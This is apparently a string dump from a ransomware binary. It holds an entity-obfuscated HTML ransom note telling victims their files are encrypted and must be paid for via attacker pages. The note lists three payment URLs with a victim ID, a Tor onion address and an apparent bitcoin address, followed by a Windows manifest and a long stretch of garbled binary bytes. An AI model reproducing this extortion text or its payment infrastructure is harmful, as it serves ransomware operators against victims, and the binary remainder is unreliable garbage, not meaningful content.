pu&#x62;&#x6c;&#105;&#x63; k&#x65;&#121;&#x2c; w&#104;ic&#x68; h&#x61;s&#32;bee&#110; t&#114;ans&#102;erred &#x74;o &#x79;our c&#111;mpu&#116;&#101;r &#x76;ia t&#104;&#x65; I&#110;ter&#x6e;e&#116;.&#32;<br>Decrypting o&#x66;&#x20;&#x59;OU&#x52;&#x20;F&#x49;LES &#105;s &#111;&#x6e;&#x6c;&#121; possib&#x6c;&#101; &#x77;i&#x74;h t&#104;&#x65; &#x68;&#101;lp of the&#32;&#112;&#114;ivate&#32;&#x6b;ey an&#x64; d&#x65;&#x63;rypt p&#x72;&#111;gr&#97;m w&#x68;ic&#104; i&#x73; &#x6f;&#110;&#x20;our Sec&#x72;&#x65;&#x74;&#32;&#x53;&#101;&#x72;ver!!!&#x20;</font><br><br><b><font class='&#116;tl'>What&#32;do&#32;I d&#x6f;?</b></font> <br><font style='f&#x6f;&#110;t-siz&#x65;:13p&#x78;;'>Al&#97;&#x73;, if y&#111;&#117; &#x64;o no&#x74;&#x20;tak&#101; the n&#x65;ce&#115;s&#97;&#114;&#121; &#109;eas&#117;&#114;&#x65;s for&#x20;the spec&#105;fi&#101;d&#32;t&#105;me &#116;&#104;&#x65;n th&#101; con&#x64;itions for obta&#105;n&#x69;&#110;&#103; the p&#114;iv&#97;t&#101;&#32;key&#x20;&#x77;ill b&#x65;&#32;&#99;&#x68;&#x61;n&#103;ed
&#x6e;<br> &#x49;&#102; you r&#101;&#x61;lly&#32;nee&#x64; your d&#97;t&#97;,&#32;&#x74;hen &#119;e sug&#x67;est yo&#x75; &#x64;&#111;&#32;not&#32;wa&#115;te va&#x6c;&#x75;a&#98;le time s&#x65;ar&#99;hi&#x6e;g f&#x6f;r other &#x73;o&#108;ution&#x73;&#32;&#98;&#101;&#99;ausen t&#104;ey &#x64;o&#32;&#x6e;ot &#101;xist.</font><br><br> <div class='&#x74;b' style='colo&#x72;:#88&#48;000&#x3b; font-size:13p&#x78;; &#x62;or&#x64;e&#x72;&#x2d;wi&#x64;t&#x68;:3&#x70;x;'>&#x46;&#x6f;r mo&#x72;e&#32;&#115;&#x70;ecif&#105;c instruc&#x74;&#105;ons,&#x20;&#112;&#x6c;&#101;as&#101; visi&#116; your&#32;&#x70;e&#114;son&#97;l&#x20;&#104;&#x6f;&#x6d;&#x65;&#32;&#112;age, there &#97;&#114;&#x65;&#x20;a fe&#119; di&#x66;ferent addr&#x65;s&#115;&#x65;s &#x70;oin&#x74;ing&#x20;to y&#x6f;ur pag&#101; b&#101;&#108;ow:<b><hr>1 - <a href=http://kkr4hbwdklf234bfl84uoqleflqwrfqwuelfh.brazabaya.com/CE7BCC16BEE07D   target="_blank">http://kkr4hbwdklf234bfl84uoqleflqwrfqwuelfh.brazabaya.com/CE7BCC16BEE07D</a> <br>2 - <a href=http://974gfbjhb23hbfkyfaby3byqlyuebvly5q254y.mendilobo.com/CE7BCC16BEE07D   target="_blank">http://974gfbjhb23hbfkyfaby3byqlyuebvly5q254y.mendilobo.com/CE7BCC16BEE07D</a> <br>3 - <a href=http://a64gfdsjhb4htbiwaysbdvukyft5q.zobodine.at/CE7BCC16BEE07D   target="_blank">http://a64gfdsjhb4htbiwaysbdvukyft5q.zobodine.at/CE7BCC16BEE07D</a> <br></div><div class="tb" style="font-size&#58;1&#51;px; border-color:#880000;"><b>&#73;f for som&#101; re&#x61;sons&#32;th&#x65; ad&#x64;res&#x73;es ar&#101;&#32;n&#111;t av&#97;ilab&#108;&#101;, &#102;ollow&#x20;&#x74;hese&#x20;s&#x74;&#101;ps:</b> <hr> 1 - Downlo&#x61;d and i&#x6e;&#115;t&#97;ll&#32;t&#111;r&#45;br&#111;&#x77;ser: <a href=http://w&#x77;w.t%6f%72pr%6f&#x6a;&#101;ct.%6f&#x72;%67/p%72ojects/torbr&#111;&#x77;se&#114;.h&#x74;ml.en target=&#92;&#x22;_bl&#97;&#110;k">h&#x74;tp:/&#x2f;www&#x2e;tor&#x70;roject&#x2e;org&#x2f;proj&#x65;c&#116;&#115;/&#x74;or&#x62;&#x72;owse&#x72;&#46;h&#116;ml&#46;e&#x6e;</a><br> 2 -&#x20;After a&#x20;successf&#117;&#108; i&#110;&#115;talla&#x74;i&#x6f;&#110;, ru&#110; &#116;&#104;e br&#x6f;ws&#101;r and wai&#x74; f&#111;r&#x20;i&#110;&#105;&#116;ializa&#x74;ion.<br>3 &#45; T&#121;pe&#x20;i&#110; th&#x65; tor&#45;browser &#x61;d&#x64;ress bar: <font style=&#x22;f&#111;nt-w&#101;&#105;gh&#x74;&#x3a;bo&#x6c;d; color:#009977;">k7tlx3ghr3m4n2tu.on&#x69;on/CE7BCC16BEE07D </font> <br> 4 -&#x20;&#x46;&#111;l &#108;ow the in&#x73;&#x74;&#x72;&#117;ct&#x69;o&#x6e;s on&#32;t&#104;e&#x20;si&#x74;&#101;.</div><br><br><b>!!&#x21; I&#77;P&#x4f;R&#84;&#65;N&#84; INFO&#82;MATIO&#x4e;:</b><br> <div class="t&#98;" style="width:&#55;9&#x30;p&#x78;&#x3b;&#x5c;&#34;> Y&#x6f;&#x75;&#x72; &#80;er&#115;on&#x61;l&#x20;PAGES<b>:<br> <a href=http://kkr4hbwdklf234bfl84uoqleflqwrfqwuelfh.brazabaya.com/CE7BCC16BEE07D target="&#95;blan&#107;">http://kkr4hbwdklf234bfl84uoqleflqwrfqwuelfh.brazabaya.com/CE7BCC16BEE07D</a> <br><a href=http://974gfbjhb23hbfkyfaby3byqlyuebvly5q254y.mendilobo.com/CE7BCC16BEE07D target="&#95;bl&#x61;&#x6e;k">http://974gfbjhb23hbfkyfaby3byqlyuebvly5q254y.mendilobo.com/CE7BCC16BEE07D</a> <br> <a href=http://a64gfdsjhb4htbiwaysbdvukyft5q.zobodine.at/CE7BCC16BEE07D target="_bl&#x61;n&#x6b;">http://a64gfdsjhb4htbiwaysbdvukyft5q.zobodine.at/CE7BCC16BEE07D</a>  <br>Your Perso&#110;al TOR-Brow&#115;&#x65;r pag&#101; &#58; <font style="&#102;ont-we&#105;g&#x68;t&#x3a;&#x62;old; color:#009977;"> k7tlx3ghr3m4n2tu.oni&#x6f;n/CE7BCC16BEE07D </font><br> Your per&#115;onal&#x20;I&#x44;&#x20;(if &#121;o&#x75; o&#x70;en the sit&#x65; dir&#101;ctl&#x79;&#41;: <font style=&#x5c;&#34;f&#x6f;nt&#45;wei&#x67;ht:&#x62;old; color:#770000;">CE7BCC16BEE07D</font><br> </div></div></center></body></html>
kQe! w
.!P$
16N8JSqU8LzmUM7UaxaA1imQ8VFmEgC61H
 _4a
 _4a
dk3;
JH{jJH{
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
4"4)40474>4E4L4S4Z4a485<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5$6=6n6
7$727>7X7
;<<R<
<:=O=g=}=
>(>R>k>
?$?*?/?5?Z?
"0-0j0{0
192y2
2+3<3z3
51585?5G5O5W5_5g5r5
5 6(6e6k6~6
7$7O7
8H8R8
9$9G9S9i9r9w9
:8:}:v;
;@<x<
=C>M>S>a>i>q>
213C3I3
3s4~4
5'5/565=5C5J5k5v5
9	9:9W9t9J:p:
0Z4i4r4x4~4
5(5A5G5R5c5
536Z6
7"72787F7L7`7
8$80868`8o8
:=:h:
:F;Y;
<-<\<b<g<n<y<
=*=3=8=E=g=x=
"0P0
2&2/282=2
&;8;W;~;
<a=h=m=w=
?#?)?8?K?g?u?
131P1l1
1*2q2
3_3i3
454<4b4g4
5)5/545j5r5{5
577<7{7
:1s1
6t6'7F7
828g8
9<9}9
<%<2<8<><H<\<j<o<~<
<S=^=g=
>/?5?j?}?
Z0r0x0
071Z1
152t2
3#3:3C3R3k3x3
4$4.494P4e4
7$7R7
7g8p8y8
9"9V9n9|9
9&:G:\:
;$;6;L;b;
;/<b<o<}<
='=4=H=R=Y=a=i=p=
=H?R?\?f?p?z?
0)030=0G0Q0h0r0|0
151?1I1S1]1m1w1
2 2*2:2D2N2X2|2
3%3I3S3]3g3q3{3
4 4*444>4H4R4i4s4}4
565@5J5T5^5n5x5
6!6+6;6E6O6Y6}6
7&7J7T7^7h7r7|7
8!8+858?8I8S8j8t8~8
9 979A9K9U9_9o9y9
:$:4:D:R:b:u:
:6;C;V;f;
<(<Z<g<z<
=)=<=L=|=
>>>K>^>n>
?%?8?H?
1%1/191C1M1]1g1q1{1
2+252?2I2m2w2
3;3E3O3Y3c3m3w3
4'414;4E4]4g4q4{4
5+555?5I5S5c5m5w5
6!616;6E6O6s6}6
7A7K7U7_7i7s7}7
8#8-878A8K8c8m8w8
919;9E9O9Y9i9s9}9
:':7:A:K:U:y:
;#;H;U;e;u;
<,<<<
='=.=9=@=Q=X=f=m=x=
>!>,>3>D>K>Y>`>k>r>}>
?&?7?>?L?S?^?e?p?w?
0*010?0F0Q0X0c0j0z0
2p2x2
7:;c;
=R>Z>m>x>}>
?"?(?9?r?|?
1!1=1C1]1l1y1
2'2M2
2h3o3
384>4J4
8&858=8J8V8b8h8z8
:":':-:7:@:K:W:\:l:q:w:}:
;.<:<
<g>x>
?)?3?L?V?i?
0Q1p1
21292A2X2q2
3.3z3
4e4(5V5
526b6i6u6{6
6 757[7
9[9a9w9|9
:$:*:2:7:?:D:L:Q:X:g:l:r:{:
:*;<;
<&<3<q<x<
<K>R>+?
0g0v0
;J<b<
7G7_7i7
7'8D8
3*6.62666:6>6B6F6
70777P7d7j7s7
7>8^8h8
9"9Q9W9_9
:q:z:
;';.;6;
<[<`<
<h=m=
=!>>>
212O2s2
363?3K3
4(4O4\4a4o4J5m5x5
5f6x607
728R8B9k9
=#=d=
= >R>z>:?l?
0 0$0(0,000z0
1$1(1,1M1w1
2 2$2(2
7!767r7
2,2>2P2b2t2
3V4c4|4
6!6,6@7^7
9 9&90999D9I9R9\9g9
:%:I:j:
>A>a>
?!?B?U?m?
0!0=0j0
2q2}2
666^6
7'7H8
9m9r9x9|9
;'>G>
9V:w;p<
333=3H3_5
6~7J8|8
9$9(9,9094989<9@9
:(:/:4:8:<:]:
:&;,;0;4;8;
0C0v0
3B4H4
5m6a7i7
9::@:N:
-1:1H1x1
`2d2h2l2p2|2
l0t0|0
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
4 9$9(9,90949x9
9D:H:\:`:p:t:|:
;0;@;D;L;d;h;
=(=H=T=p=|=
>4>8>X>x>
? ?@?p?
0 0D0P0X0
1$1<1@1
0(000X8X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
;(;8;H;X;|;
=X=\=`=d=h=l=p=t=x=|=
5@5`5
